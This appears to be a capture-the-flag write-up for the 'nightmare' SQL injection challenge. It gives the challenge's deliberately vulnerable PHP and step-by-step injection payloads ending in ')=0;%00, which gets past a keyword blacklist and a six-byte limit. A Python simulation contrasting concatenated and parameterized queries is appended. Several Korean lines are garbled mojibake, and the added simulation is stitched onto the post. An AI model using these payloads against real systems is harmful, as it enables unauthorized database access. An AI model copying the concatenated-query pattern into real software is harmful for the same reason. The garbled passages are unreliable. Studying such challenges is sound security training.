nightmare

Kortsec1 2023. 8. 3. 22:31

1. Code

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  // Blacklist: reject pw containing prob, _, ., (), # or - (case-insensitive)
  if(preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~");
  // Length limit: pw may be at most 6 bytes
  if(strlen($_GET[pw])>6) exit("No Hack ~_~");
  // pw is concatenated straight into the query, followed by id!='admin'
  $query = "select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  // Any row with a non-empty id solves the challenge
  if($result['id']) solve("nightmare");
  highlight_file(__FILE__);
?>

 


2. Condition

  • prob, _, ., (), # and - are filtered.
  • The strlen function limits the length of the GET parameter pw to 6 or less.

 


3. Solution

First, let's assume there are no restrictions and write out the required parts step by step.

 

select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'

Variable name   Value
pw              ') or 1=1#

 

 

๋‹ค์Œ์œผ๋กœ ํ•„ํ„ฐ๋ง์„ ์šฐํšŒํ•ด ๋ณด์ž.

์œ„ ์ฟผ๋ฆฌ์—์„œ๋Š” #์ด ํ•„ํ„ฐ๋ง์— ๊ฑธ๋ฆฌ๊ฒŒ ๋œ๋‹ค.

#๊ณผ -๋ชจ๋‘ ํ•„ํ„ฐ๋ง ๋˜์–ด, ;%00์„ ์ด์šฉํ•˜์—ฌ ์šฐํšŒํ•ด ์ฃผ์—ˆ๋‹ค.

๋ณ€์ˆ˜๋ช… ๊ฐ’
pw ') or 1=1;%00

 

 

Second, we'll fit the length limit.

The current value is 11 characters long; swapping out the or alone cannot get it down to 6 or less.

By changing the boolean logic I was just barely able to fit length 6.

Variable name   Value
pw              ')=0;%00

 

 

์œ„ ๊ฐ’์„ ์ตœ์ข…์ ์œผ๋กœ ์ž…๋ ฅํ•ด์ฃผ๋ฉด ๋ฌธ์ œ๊ฐ€ ํ•ด๊ฒฐ๋œ๋‹ค.

[Image: nightmare clear]
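To see why the length-limited blacklist fails and what actually closes the hole, here is an added Python simulation (not code from the page or from the challenge): it reproduces the page's regex and length check, runs the final payload through a string-concatenated query against a constructed SQLite table, and contrasts that with a parameterized query. The NUL-byte truncation of the query text is emulated explicitly, since that is the behaviour the write-up relies on; the table rows are constructed placeholders.

```python
import re
import sqlite3

# The challenge's two input checks, re-implemented from the page's PHP.
BLACKLIST = re.compile(r'prob|_|\.|\(\)|#|-', re.IGNORECASE)
MAX_LEN = 6
# Final payload from the write-up; %00 arrives in PHP as a single NUL byte.
PAYLOAD = "')=0;\x00"


def passes_filter(pw: str) -> bool:
    """True if pw gets past the blacklist and the strlen(pw) <= 6 check."""
    return BLACKLIST.search(pw) is None and len(pw.encode()) <= MAX_LEN


def setup_db() -> sqlite3.Connection:
    """Constructed sample table; the real challenge's rows are not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("create table prob_nightmare(id text, pw text)")
    db.executemany("insert into prob_nightmare values (?, ?)",
                   [("admin", "placeholder-admin-pw"), ("guest", "guest")])
    return db


def vulnerable_lookup(db: sqlite3.Connection, pw: str):
    """Build the query by string concatenation, exactly as the challenge does."""
    query = f"select id from prob_nightmare where pw=('{pw}') and id!='admin'"
    # Emulate the effect the write-up relies on: the NUL byte ends the query
    # text, so the trailing ") and id!='admin'" never reaches the parser.
    query = query.split("\x00", 1)[0]
    # What remains is "... where pw=('')=0;"; (pw='') = 0 is true for every
    # row whose pw is non-empty, so some id comes back regardless of pw.
    row = db.execute(query).fetchone()
    return row[0] if row else None


def safe_lookup(db: sqlite3.Connection, pw: str):
    """Parameterized form: pw is bound as data, so the same bytes are
    compared literally against the column and match nothing."""
    row = db.execute(
        "select id from prob_nightmare where pw=? and id!='admin'", (pw,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = setup_db()
    print("filter passes payload:", passes_filter(PAYLOAD))
    print("concatenated query   :", vulnerable_lookup(db, PAYLOAD))
    print("parameterized query  :", safe_lookup(db, PAYLOAD))
```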

 
